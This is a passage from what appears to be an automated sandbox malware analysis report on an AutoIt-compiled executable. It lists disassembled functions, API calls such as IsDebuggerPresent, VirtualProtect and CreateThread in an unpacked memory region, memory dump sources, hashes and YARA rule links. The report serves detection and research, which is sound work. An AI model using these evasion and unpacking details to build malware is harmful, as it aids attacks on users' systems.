                                                                                                                                                  • Associated: 00000001.00000002.1737471158.00000000004B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737544397.00000000004BE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737568181.00000000004C7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737611454.000000000050F000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737640256.0000000000516000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_1_2_400000_x.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: BuffCharLower
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 2358735015-0
                                                                                                                                                  • Opcode ID: 3bd510dce60f882055807d3a845cafcdb67b7cee73f834c135eafde4b5b67fbd
                                                                                                                                                  • Instruction ID: ca699bb1c278210e2bea96785600e82950db412e583262dd6e63fce83db42ac8
                                                                                                                                                  • Opcode Fuzzy Hash: 3bd510dce60f882055807d3a845cafcdb67b7cee73f834c135eafde4b5b67fbd
                                                                                                                                                  • Instruction Fuzzy Hash: 0441A2B2500709AFDB11DF65C8809AFB3B8EB44314F10862FE956D7281EB78AE01CB55
                                                                                                                                                  Function 00407A51 Relevance: 3.1, APIs: 2, Instructions: 97COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000001.00000002.1737358900.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000001.00000002.1737309382.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737471158.000000000048F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737471158.00000000004B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737544397.00000000004BE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737568181.00000000004C7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737611454.000000000050F000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737640256.0000000000516000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_1_2_400000_x.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: _memmove
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 4104443479-0
                                                                                                                                                  • Opcode ID: 342b1ffb58077d8b19272d94146cfab44cad903d4b78f1b9013ddb096df52ce6
                                                                                                                                                  • Instruction ID: 2724e85abdc1188f3097b0ceee28e317ee468c7dcaf0b9eeda237b3ec1003ef0
                                                                                                                                                  • Opcode Fuzzy Hash: 342b1ffb58077d8b19272d94146cfab44cad903d4b78f1b9013ddb096df52ce6
                                                                                                                                                  • Instruction Fuzzy Hash: CB31C4B1B00506AFC704DF69D891E69B3A4FF48314715822AE519CB3D1EB38F911CB95
                                                                                                                                                  Function 00A75A3B Relevance: 3.1, APIs: 2, Instructions: 61threadCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  • CreateThread.KERNEL32(00000000,00000000,00A755C0,?,00000000,00000000), ref: 00A75A51
                                                                                                                                                  • RtlExitUserThread.NTDLL(00000000), ref: 00A75B11
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000001.00000002.1737982563.0000000000A70000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A70000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_1_2_a70000_x.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: Thread$CreateExitUser
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 4108186749-0
                                                                                                                                                  • Opcode ID: 609b53989c3d95273d7548ffdac313cae53326034b14b9c1c3aeae66f42ad666
                                                                                                                                                  • Instruction ID: 5bb19e6b6bca6d577d6af79044e01eea3b8784a3c7ad12da4e0eb41220031de6
                                                                                                                                                  • Opcode Fuzzy Hash: 609b53989c3d95273d7548ffdac313cae53326034b14b9c1c3aeae66f42ad666
                                                                                                                                                  • Instruction Fuzzy Hash: D7111711D0DBC14ED7238B784C25766AFA05F62720F5DC6DAD0988E0E3D2D98D0993A3
                                                                                                                                                  Function 004047D0 Relevance: 3.1, APIs: 2, Instructions: 59COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  • IsThemeActive.UXTHEME ref: 00404834
                                                                                                                                                    • Part of subcall function 0042336C: __lock.LIBCMT ref: 00423372
                                                                                                                                                    • Part of subcall function 0042336C: DecodePointer.KERNEL32(00000001,?,00404849,00457C74), ref: 0042337E
                                                                                                                                                    • Part of subcall function 0042336C: EncodePointer.KERNEL32(?,?,00404849,00457C74), ref: 00423389
                                                                                                                                                    • Part of subcall function 004048FD: SystemParametersInfoW.USER32(00002000,00000000,?,00000000), ref: 00404915
                                                                                                                                                    • Part of subcall function 004048FD: SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 0040492A
                                                                                                                                                    • Part of subcall function 00403B3A: GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00403B68
                                                                                                                                                    • Part of subcall function 00403B3A: IsDebuggerPresent.KERNEL32 ref: 00403B7A
                                                                                                                                                    • Part of subcall function 00403B3A: GetFullPathNameW.KERNEL32(00007FFF,?,?,004C52F8,004C52E0,?,?), ref: 00403BEB
                                                                                                                                                    • Part of subcall function 00403B3A: SetCurrentDirectoryW.KERNEL32(?), ref: 00403C6F
                                                                                                                                                  • SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 00404874
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000001.00000002.1737358900.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000001.00000002.1737309382.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737471158.000000000048F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737471158.00000000004B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737544397.00000000004BE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737568181.00000000004C7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737611454.000000000050F000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737640256.0000000000516000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_1_2_400000_x.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: InfoParametersSystem$CurrentDirectoryPointer$ActiveDebuggerDecodeEncodeFullNamePathPresentTheme__lock
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 1438897964-0
                                                                                                                                                  • Opcode ID: 13bbe0c74f5194e49c071aa5a0b14ab81aac5f2f5d26dabd82ae82306b4d1084
                                                                                                                                                  • Instruction ID: 9525eea27cfe2a06ee6bb0b94f8a439f0fec78f72a1223afaaa4f4cc7b3f6ca0
                                                                                                                                                  • Opcode Fuzzy Hash: 13bbe0c74f5194e49c071aa5a0b14ab81aac5f2f5d26dabd82ae82306b4d1084
                                                                                                                                                  • Instruction Fuzzy Hash: 96118E729143019BC700EF69E80591EBBE8EB95754F10893FF440932B2DB749A49CB9E
                                                                                                                                                  Function 00420DB6 Relevance: 3.0, APIs: 2, Instructions: 44COMMONLIBRARYCODE
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                    • Part of subcall function 0042571C: __FF_MSGBANNER.LIBCMT ref: 00425733
                                                                                                                                                    • Part of subcall function 0042571C: __NMSG_WRITE.LIBCMT ref: 0042573A
                                                                                                                                                    • Part of subcall function 0042571C: RtlAllocateHeap.NTDLL(00B60000,00000000,00000001,?,00000000,00000001,?,00420DD3,?,00000000,%I,?,00409E8C,?,?,?), ref: 0042575F
                                                                                                                                                  • std::exception::exception.LIBCMT ref: 00420DEC
                                                                                                                                                  • __CxxThrowException@8.LIBCMT ref: 00420E01
                                                                                                                                                    • Part of subcall function 0042859B: RaiseException.KERNEL32(?,?,00000000,004B9E78,?,00000001,?,?,?,00420E06,00000000,004B9E78,00409E8C,00000001), ref: 004285F0
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000001.00000002.1737358900.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000001.00000002.1737309382.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737471158.000000000048F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737471158.00000000004B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737544397.00000000004BE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737568181.00000000004C7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737611454.000000000050F000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737640256.0000000000516000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_1_2_400000_x.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: AllocateExceptionException@8HeapRaiseThrowstd::exception::exception
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 3902256705-0
                                                                                                                                                  • Opcode ID: 9167050c2dc4b0825c829503e55bc25cac2c16fe4eec559eca79d4812c62c980
                                                                                                                                                  • Instruction ID: 7ce0db18d3e86308d2e94e4ef4c1f65fcbea9f9514d772724804ad69f7891851
                                                                                                                                                  • Opcode Fuzzy Hash: 9167050c2dc4b0825c829503e55bc25cac2c16fe4eec559eca79d4812c62c980
                                                                                                                                                  • Instruction Fuzzy Hash: BAF0863560223976CB10BA95FD015DF7BE89F01315F90452FF90496282DFB89A8091DD
                                                                                                                                                  Function 004255FD Relevance: 3.0, APIs: 2, Instructions: 42COMMONLIBRARYCODE
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000001.00000002.1737358900.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000001.00000002.1737309382.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737471158.000000000048F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737471158.00000000004B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737544397.00000000004BE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737568181.00000000004C7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737611454.000000000050F000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737640256.0000000000516000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_1_2_400000_x.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: __lock_file_memset
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 26237723-0
                                                                                                                                                  • Opcode ID: ba8f5e451a8ec4a75135d94e347059916301475a1d87ff8d947c1e1db94b3a7d
                                                                                                                                                  • Instruction ID: eb59cd814e1449f2521413b7bdb600bd306f3e119aeaedc73612e9d55c5f6ff2
                                                                                                                                                  • Opcode Fuzzy Hash: ba8f5e451a8ec4a75135d94e347059916301475a1d87ff8d947c1e1db94b3a7d
                                                                                                                                                  • Instruction Fuzzy Hash: B901D871A01624ABCF21AF66BC0259F7B61AF50325FD0411FB81817251DB398551DF59
                                                                                                                                                  Function 004253A6 Relevance: 3.0, APIs: 2, Instructions: 33COMMONLIBRARYCODE
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                    • Part of subcall function 00428B28: __getptd_noexit.LIBCMT ref: 00428B28
                                                                                                                                                  • __lock_file.LIBCMT ref: 004253EB
                                                                                                                                                    • Part of subcall function 00426C11: __lock.LIBCMT ref: 00426C34
                                                                                                                                                  • __fclose_nolock.LIBCMT ref: 004253F6
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000001.00000002.1737358900.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000001.00000002.1737309382.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737471158.000000000048F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737471158.00000000004B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737544397.00000000004BE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737568181.00000000004C7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737611454.000000000050F000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737640256.0000000000516000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_1_2_400000_x.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: __fclose_nolock__getptd_noexit__lock__lock_file
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 2800547568-0
                                                                                                                                                  • Opcode ID: 835793fb4b5a24fbea1eeed30733b59c67049ef9a82bceb899d9520eea3a16f0
                                                                                                                                                  • Instruction ID: fafcd99f2ade88ab86af259f2ce8aa17897398df1327fb2dd29172a4384519b5
                                                                                                                                                  • Opcode Fuzzy Hash: 835793fb4b5a24fbea1eeed30733b59c67049ef9a82bceb899d9520eea3a16f0
                                                                                                                                                  • Instruction Fuzzy Hash: 56F09C71B026249AD710BF66780579D66E06F41378FA1914FE814E71C1CFBC49419B5E
                                                                                                                                                  Function 00A75D20 Relevance: 2.5, APIs: 2, Instructions: 38COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  • VirtualFree.KERNELBASE(00000000,00000000,00008000), ref: 00A75D6D
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000001.00000002.1737982563.0000000000A70000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A70000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_1_2_a70000_x.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: FreeVirtual
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 1263568516-0
                                                                                                                                                  • Opcode ID: 1b853c6b324262bf2619f0c91ba1aa14634ce69c964d86d990b9c5fd9e0e26d6
                                                                                                                                                  • Instruction ID: 0ce69b146f9212bb4db01a584da802aa76d1322e986ce120d1f3d22036698787
                                                                                                                                                  • Opcode Fuzzy Hash: 1b853c6b324262bf2619f0c91ba1aa14634ce69c964d86d990b9c5fd9e0e26d6
                                                                                                                                                  • Instruction Fuzzy Hash: 5DF0E950E04F40EADEBEC3B8ED6EB702A54AF21768F0DC259A24D190B386D51C16C102
                                                                                                                                                  Function 00A75F10 Relevance: 1.7, APIs: 1, Instructions: 223COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000001.00000002.1737982563.0000000000A70000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A70000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_1_2_a70000_x.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 6ae3160d54f2189ac21c3dd56c4f0c5f04d15ec53e6499b9d1b1f041dd650129
                                                                                                                                                  • Instruction ID: 2986a85742c60b8569bfca362a0d137e4f5c2fc507f283e10aa923b46f400c62
                                                                                                                                                  • Opcode Fuzzy Hash: 6ae3160d54f2189ac21c3dd56c4f0c5f04d15ec53e6499b9d1b1f041dd650129
                                                                                                                                                  • Instruction Fuzzy Hash: 1B71B131D0CF809EC73A87388C18775BBA06B62324F5DC69AD09D8B1E3D2F58D468792
                                                                                                                                                  Function 00BF7070 Relevance: 1.7, APIs: 1, Instructions: 177COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                    • Part of subcall function 00BF68E0: GetFileAttributesW.KERNEL32(?), ref: 00BF68EB
                                                                                                                                                  • CreateDirectoryW.KERNEL32(?,00000000), ref: 00BF71F9
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000001.00000002.1738404215.0000000000BF6000.00000040.00000020.00020000.00000000.sdmp, Offset: 00BF6000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_1_2_bf6000_x.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: AttributesCreateDirectoryFile
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 3401506121-0
                                                                                                                                                  • Opcode ID: 7d4e6f6d57b86d136528d619b2890034901a407a686aacffe932b09596e90024
                                                                                                                                                  • Instruction ID: f447d13751a80785c69e62636e28da0db69ac69f190e885853b1dd14ff3301d1
                                                                                                                                                  • Opcode Fuzzy Hash: 7d4e6f6d57b86d136528d619b2890034901a407a686aacffe932b09596e90024
                                                                                                                                                  • Instruction Fuzzy Hash: 22615F31A2420C97EF14DFA0D854BEF737AEF58700F0045A9A609E7290EE769A49C7A5
                                                                                                                                                  Function 00A76490 Relevance: 1.6, APIs: 1, Instructions: 101COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000001.00000002.1737982563.0000000000A70000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A70000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_1_2_a70000_x.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 6147e21af328a78811df18dd13b0224b96cd257dd3f149ba0aebb99174c0c2cc
                                                                                                                                                  • Instruction ID: 0a9bc7ae436f874f575d42de0b1d82de3d3728f0725bf42a1f76daa43a08cafb
                                                                                                                                                  • Opcode Fuzzy Hash: 6147e21af328a78811df18dd13b0224b96cd257dd3f149ba0aebb99174c0c2cc
                                                                                                                                                  • Instruction Fuzzy Hash: AE31A371D0CF409ECB358B68CD48379BBB06BA2710F4CC69AD08D8B1A2D6758C09D792
                                                                                                                                                  Function 00420C08 Relevance: 1.6, APIs: 1, Instructions: 94memoryCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000001.00000002.1737358900.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000001.00000002.1737309382.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737471158.000000000048F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737471158.00000000004B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737544397.00000000004BE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737568181.00000000004C7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737611454.000000000050F000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737640256.0000000000516000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_1_2_400000_x.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: ProtectVirtual
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 544645111-0
                                                                                                                                                  • Opcode ID: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                                                                                                                  • Instruction ID: 57d61025d726f571206bde1542701663147cad70cf876be0f0a1b4f50b8a7032
                                                                                                                                                  • Opcode Fuzzy Hash: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                                                                                                                  • Instruction Fuzzy Hash: 9031E7B0B001159BC71CDF0AE484A6AF7E5FB49300BA48696E40ACB356D635EDC1DB89
                                                                                                                                                  Function 0043FCAC Relevance: 1.6, APIs: 1, Instructions: 88COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000001.00000002.1737358900.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000001.00000002.1737309382.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737471158.000000000048F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737471158.00000000004B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737544397.00000000004BE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737568181.00000000004C7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737611454.000000000050F000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737640256.0000000000516000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_1_2_400000_x.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: ClearVariant
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 1473721057-0
                                                                                                                                                  • Opcode ID: e5b39714ab5e060571701c2fd87f9e8eca858aac3ab78beea71fa84ca8624b4f
                                                                                                                                                  • Instruction ID: 88ec2210b97eaeb66bd16e67604d6e353b3070822350be419431805434595ad1
                                                                                                                                                  • Opcode Fuzzy Hash: e5b39714ab5e060571701c2fd87f9e8eca858aac3ab78beea71fa84ca8624b4f
                                                                                                                                                  • Instruction Fuzzy Hash: 24414C746083419FDB14DF14C444B1ABBE1BF45318F0988ADE8999B362C739EC45CF4A
                                                                                                                                                  Function 0040784B Relevance: 1.6, APIs: 1, Instructions: 71COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000001.00000002.1737358900.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000001.00000002.1737309382.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737471158.000000000048F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737471158.00000000004B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737544397.00000000004BE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737568181.00000000004C7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737611454.000000000050F000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737640256.0000000000516000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_1_2_400000_x.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: _memmove
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 4104443479-0
                                                                                                                                                  • Opcode ID: f7e62a8e1c5e2c2480a96847b068e2bf3622822eade55fefb08bb6a489eda471
                                                                                                                                                  • Instruction ID: 03ec0e1ddcc1c42b0f32453fdad85b9eaadac3e2e088d633c8de65ee5d072679
                                                                                                                                                  • Opcode Fuzzy Hash: f7e62a8e1c5e2c2480a96847b068e2bf3622822eade55fefb08bb6a489eda471
                                                                                                                                                  • Instruction Fuzzy Hash: 4111D532A04215ABD714EF28D485C6AB7A9EF85324724812FE905DB3D1DB35FC01C799
                                                                                                                                                  Function 00404DDD Relevance: 1.6, APIs: 1, Instructions: 64libraryCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                    • Part of subcall function 00404BB5: FreeLibrary.KERNEL32(00000000,?), ref: 00404BEF
                                                                                                                                                    • Part of subcall function 0042525B: __wfsopen.LIBCMT ref: 00425266
                                                                                                                                                  • LoadLibraryExW.KERNEL32(?,00000000,00000002,?,004C52F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00404E0F
                                                                                                                                                    • Part of subcall function 00404B6A: FreeLibrary.KERNEL32(00000000), ref: 00404BA4
                                                                                                                                                    • Part of subcall function 00404C70: _memmove.LIBCMT ref: 00404CBA
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000001.00000002.1737358900.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000001.00000002.1737309382.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737471158.000000000048F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737471158.00000000004B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737544397.00000000004BE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737568181.00000000004C7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737611454.000000000050F000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737640256.0000000000516000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_1_2_400000_x.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: Library$Free$Load__wfsopen_memmove
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 1396898556-0
                                                                                                                                                  • Opcode ID: 38ec5427debe44dbaf010247b0005924d02b12c3bdd9824270641944ab0405bf
                                                                                                                                                  • Instruction ID: 9236aa628d2d192556c2689c07174e5c913df1e85eea92ba98d954e2704214a9
                                                                                                                                                  • Opcode Fuzzy Hash: 38ec5427debe44dbaf010247b0005924d02b12c3bdd9824270641944ab0405bf
                                                                                                                                                  • Instruction Fuzzy Hash: 8511C471600205ABCF14BF71C812FAE77A8AFC4718F10883FF641B71C1DA79AA059B99
                                                                                                                                                  Function 0043FD85 Relevance: 1.6, APIs: 1, Instructions: 63COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000001.00000002.1737358900.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000001.00000002.1737309382.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737471158.000000000048F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737471158.00000000004B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737544397.00000000004BE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737568181.00000000004C7000.00000002.00000001.01000000.00000009.sdmpDownload File
